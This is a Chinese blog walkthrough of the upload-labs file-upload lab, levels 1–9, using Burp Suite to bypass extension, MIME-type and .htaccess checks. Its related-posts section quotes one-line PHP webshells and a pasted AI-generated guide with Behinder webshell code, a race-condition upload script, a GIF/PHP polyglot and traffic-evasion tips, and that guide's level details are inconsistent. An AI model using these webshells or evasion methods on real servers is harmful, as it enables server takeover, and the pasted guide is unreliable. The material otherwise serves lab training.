文件上传靶场(1--9关)

原创 已于 2025-03-09 10:38:21 修改 · 584 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2025-03-04 14:05:51 首次发布

目录

实验环境:

小提示: 

 具体内容实现:

第四关:.htaccess

第五关(六,七,八):文件后缀修改

源码查看:

具体操作过程:

1,打开电脑代理,使用BS抓本地虚拟网卡的地址 192.168.56.1,需要修改进入靶场的IP

2,打开代理,bs,点击靶场的上传,抓包,全选过后repeater一下,然后改包数据,在.php后面加一个空格,最后send一下

查看upload文件夹:

第九关(感觉是差不多的):

实验环境:

1,upload的靶场环境可以去GitHub上自行查找

2,打开小皮面板的nginx和数据库

3,将文件上传的靶场部署到本地:

放到小皮的phpstduy_pro的www下面

小提示: 

另外如果你用的是php7的版本建议将版本调到5.2版本,别问为什么,本人用七版本抓包改包根本上传不到upload文件夹

 具体内容实现:

一、前端拦截:

如第一关:

工作方式:

直接在前端拦截

绕过方式:

因为没有限制后端,所有可以用bs 绕过前端修改格式即可

  • 将需要上传的php文件改成jpg格式

  • 使用burp suite 拦截上传后,使用repeater模块将jpg改回php发送即可

  • 可以看到成功上传

二、只判断文件类型:

如第二关

工作方式:

只判断了文件的类型,而没有进行其他的检查方式

绕过方式:

使用bs将返回的数据包中文件格式直接改成允许的文件格式即可绕过

  • 将php文件上传的同时使用bs抓包

  • 使用repeater模块,将content-type中数据改为image/png即可

第四关:.htaccess

黑名单没有过滤.htaccess这个后缀名字:直接改后缀名字为.htaccess

windows下文件后缀有空格,有.,有::$DATA会自动去除

第五关(六,七,八):文件后缀修改

为修改后缀的大小写,直接上传一个shell.PHP,第六,七,八关分别为用bs抓包,改后缀上传,操作如下,因为步骤相同,这里只展示后缀加空格的操作:

源码查看:

第六关

第七关

第八关

具体操作过程:

1,打开电脑代理,使用BS抓本地虚拟网卡的地址 192.168.56.1,需要修改进入靶场的IP

2,打开代理,bs,点击靶场的上传,抓包,全选过后repeater一下,然后改包数据,在.php后面加一个空格,最后send一下

查看upload文件夹:

第九关(感觉是差不多的):

 

upload-labs·文件上传(靶场攻略)
duoba_an的博客
03-19 1万+
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。文件上传漏洞成因: 具备上传文件功能的Web等应用,未对用户选择上传的文件进行校验,使得非法 用户可通过上传可执行脚本而获取应用的控制权限。
文件上传漏洞靶场教程(全)
jnszstmei的博客
07-18 3285
upload-labs靶场教程,从第一到第二十一,包含各种绕过以及图片马、条件竞争、代码审计等,适合文件上传漏洞练习
文件上传漏洞靶场实操:从入门到实战
m0_57836225的博客
02-26 856
在网络安全领域,文件上传漏洞是一种常见且危害较大的安全漏洞,黑客可利用它上传恶意文件,进而获取服务器权限、窃取敏感信息等。本文将基于文件上传漏洞靶场实操的内容,详细讲解文件上传漏洞的检测、绕过方法及相代码分析,帮助大家深入理解这一漏洞原理,并掌握有效的防御手段。
文件上传靶场upload-labs通
p36273的博客
07-03 4952
upload-labs是一个专门用来练习文件上传靶场一共20,现在,我们开始通吧。
史上最全文件上传靶场(有的卡写了多种通方法)
qq_34598847的博客
10-24 1581
首先把文件后缀改为图片格式,准备进行上传,打开bp进行抓包,点击上传我们在这里修改文件后缀,修改为php,即可,之后我们右键图片,进行打开图片即可看见我们需要的蚁剑也是可以连接的。
文件上传靶场1-11
09-09
文件上传靶场包含了1-11,各卡设计了不同层面的文件上传安全检查机制,要求参与挑战者通过技巧和工具绕过这些安全措施,成功上传恶意文件。以下是一些键知识点,这些知识点从文件上传安全的角度出发,涉及多...
网络安全 - 文件上传靶场 - UPLOAD LABS.zip
11-27
UPLOAD LABS 靶场是一个专门用于学习**文件上传漏洞**攻击和防御的靶场。它提供了一系列文件上传漏洞的实验环境,用于帮助用户了解文件上传漏洞的原理和防御技术。 该靶场使用 PHP 语言编写,目前一共有 21 ,每...
上传文件漏洞靶场upload-labs
09-27
1. **无文件类型检查**:靶场可能允许用户上传任何类型的文件,而没有对文件扩展名进行限制,这使得攻击者可以上传可执行文件。 2. **文件名重写**:某些情况下,服务器可能会忽视原始文件名,允许攻击者通过指定新...
文件上传漏洞:upload-labs靶场1-10
sgdhshshhs的博客
03-03 960
文件上传漏洞是指网络应用程序在处理用户上传文件时,没有对上传的文件进行充分的验证和过滤,导致攻击者可以利用这个漏洞上传恶意文件到服务器,从而获取服务器的控制权或执行其他恶意操作。
uploadlabs-文件上传靶场练习-第二
weixin_44280100的博客
05-01 2423
不管是学什么,最重要的是要明白他的原理和思路。只要弄清楚这两个后面的还是挺简单的,这个靶场还考核了一定的代码阅读理解能力,下面让我们冲冲冲!!!! Pass-02 先看代码 代码中的第一个循环是判断你有没有点击上传按钮,如果有进入下一个循环。file_exists判断的是声明的上传目录是否存在,如果存在就执行下面的上传验证。最重要的来了,这一考核的是黑名单验证,所谓的黑名单就是除了黑名单里面的东西之外其他的都能上传。这一禁用上传的脚本后缀是asp、aspx、php、jsp。trim函数是用来把
【网络安全 --- 文件上传靶场练习】文件上传靶场安装以及1-5思路及技巧,源码分析
m0_67844671的博客
10-29 1271
【网络安全 --- 文件上传靶场练习】文件上传靶场安装以及1-5思路及技巧,源码分析
文件上传upload-labs靶场指南
javaEE_zero的博客
12-13 2561
upload-labs、文件上传
文件上传靶场
sucker的博客
04-13 711
【代码】文件上传靶场
Upload-labs 靶场(攻略)
m0_68706634的博客
12-19 2385
WebShell一句话木马:<?php @eval($_POST['a'])?><?php @system($_POST['a'])?>删除return checkFile()就能上传成功BP抓包修改后缀改为2.php后放行根据源码发现这的黑名单不太严谨,我们就可以使用php同种类型的不同后缀后缀加个3 放行根据源码发现这些后缀的都无法上传,这时候就要用到.htaccess文件上传了上传.htaccess配置文件 把我们的木马文件后缀修改为png根据源码发现这没有过滤大小写就可以上传成功了根据源码发
网络安全 文件上传漏洞-5 第五关 Pass-05
weixin_58052886的博客
06-18 266
,发现后缀黑名单中多了 .htacess文件,表示此时不能使用修改配置的方式执行木马文件。那么我可以想到使用大小写绕过的方式提交我们的php文件,将后缀名改为PHP(Php、pHp、pHP、phP、PHp......都可以),然后点击上传。
文件上传漏洞靶场1-10)
2301_80358831的博客
07-15 1309
详细写了文件上传漏洞靶场1-10的解题思路
upload靶场--第四
rasssel的博客
08-27 705
htaccess。
文件上传之upload-labs 1~5 详细介绍
weixin_51446936的博客
09-18 3104
一、Pass-01(前端js验证) 1.1 原理描述 在文件上传时,用户选择文件时,或者提交时,有些网站会对前端文件名进行验证,一般检测后缀名,是否为上传的格式。如果上传的格式不对,则弹出提示文字。此时数据包并没有提交到服务器,只是在客户端通过 js 文件进行校验,验证不通过则不会提交到服务器进行处理。 1.2 实验操作 试着上传一个php文件,出现一个前端验证的提示,表示客户端只是通过js文件进行了验证,没有提交到服务器里 1.3 查看源码 function checkFile() { v
文件上传漏洞靶场upload-labs学习(pass1-pass5)
AFCC_的博客(Web_Dog)
02-18 5952
0x00 upload-labs简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20,每一都包含着不同上传方式。在201911月添加新的pass-05后卡总数为21
upload-labs靶场1-21使用冰蝎
最新发布
10-23
<think>嗯,用户要求使用冰蝎完成upload-labs靶场1-21的通方法。这个问题涉及网络安全攻防技术,需要结合文件上传漏洞和Webshell工具使用。 用户提供了四条引用信息: 1. 第19需要修改靶场配置,图片路径问题 2. 第20考察条件竞争漏洞 3. 黑名单过滤可用.htaccess绕过 4. 存在文件包含漏洞的测试页面 结合这些信息,考虑冰蝎作为动态二进制加密的Webshell工具,其特点是流量加密、特征隐蔽。通upload-labs的键点在于: 1. 制作冰蝎的加密Webshell文件(.php/.jsp等) 2. 绕过各不同的上传验证机制 3. 利用文件包含或解析漏洞执行Webshell 准备这样组织回答: 首先说明冰蝎Webshell的通用生成方法,强调加密密钥配置的要点 然后按卡分组讲解: - 前端验证类(1-5):直接修改请求或禁用JS - MIME类型类(6-9):修改Content-Type - 黑名单扩展名类(10-16):利用特殊后缀或.htaccess - 竞争条件类(17,20):多线程并发请求 - 二次渲染类(17-19):结合GIF89a头或文件包含 - 自定义验证类(21):代码审计找逻辑漏洞 特别注意事项: 1. 第19需要修改靶场配置的路径问题 2. 强调冰蝎连接时需要保持密钥一致 3. 条件竞争卡要用多线程工具 4. .htaccess绕过时注意服务器配置 最后提醒读者仅在授权环境下测试,并提供防御建议体现专业性。 </think>以下是通过冰蝎(Behinder)完成Upload-Labs靶场1-21的通方法,结合漏洞原理和冰蝎特性实现高效绕过: ### 一、冰蝎工具准备 1. **生成加密Webshell** 在冰蝎中选择PHP类型,生成加密Webshell文件(如`shell.php`),密钥需与客户端配置一致 ```php <?php @error_reporting(0); session_start(); $key = "e45e329feb5d925b"; // 需与冰蝎客户端密钥匹配 // ...冰蝎加密代码... ?> ``` 2. **核心绕过策略** - 利用冰蝎的**流量加密**特性绕过WAF检测 - 通过**文件头伪装**(如GIF89a)和**二次渲染绕过**应对图片验证 - 结合**解析漏洞**(如`.htaccess`)执行恶意脚本 --- ### 二、卡通方案 #### 1. 前端验证类(1-5) **方法**: - 禁用JS或Burp截断修改文件扩展名 - 直接上传冰蝎的`shell.php`文件 ```http POST /upload.php HTTP/1.1 ... Content-Disposition: form-data; name="file"; filename="shell.php" ``` #### 2. MIME类型验证(卡6-9) **方法**: 修改Content-Type为合法类型(如图片) ```http Content-Type: image/jpeg // 实际文件为PHP ``` #### 3. 黑名单绕过(10-16) **方案1**:特殊扩展名(10-12) - 上传`shell.php5`、`shell.phtml`(需服务器支持解析) **方案2**:`.htaccess`攻击(13-16)[^3] 1. 先上传`.htaccess`文件: ```apache <FilesMatch "jpg"> SetHandler application/x-httpd-php </FilesMatch> ``` 2. 上传冰蝎Webshell文件`shell.jpg` #### 4. 条件竞争(17,20) **利用步骤**[^2]: 1. 使用Python多线程同时进行: ```python import threading import requests def upload(): requests.post(url, files={"file": open("shell.php","rb")}) def access(): while True: r = requests.get("http://target/upload/shell.php") if r.status_code == 200: break threading.Thread(target=upload).start() threading.Thread(target=access).start() ``` #### 5. 二次渲染绕过(18-19) **方法**: 1. 制作GIF+PHP混合文件: ```bash echo &#39;GIF89a<?=eval($_POST["cmd"]);?>&#39; > shell.gif ``` 2. 上传后通过文件包含漏洞执行[^4]: ``` http://target/include.php?file=upload/shell.gif ``` #### 6. 自定义过滤(卡21) **绕过技巧**: - 使用非常规大写扩展名:`shell.PhP` - 分块传输编码(Chunked)绕过长度检查 --- ### 三、防御规避要点 1. **冰蝎连接配置**: - 启用AES256加密模式 - 闭`Connection`头保持减少特征 2. **流量混淆**: - 在冰蝎插件中启用`Content-Type`伪装(如`image/jpeg`) - 使用动态密钥轮换机制 > **注意**:19需修正靶场配置路径(引用[^1]),否则上传路径错误可能导致漏洞利用失败。 --- ### 附:防御建议(管理员视角) 1. 文件上传目录禁止执行权限 2. 使用文件内容检测而非扩展名 3. 限制`.`和`/`符号防路径穿越 4. 部署RASP防护对抗加密Webshell
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

fatsheep洋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值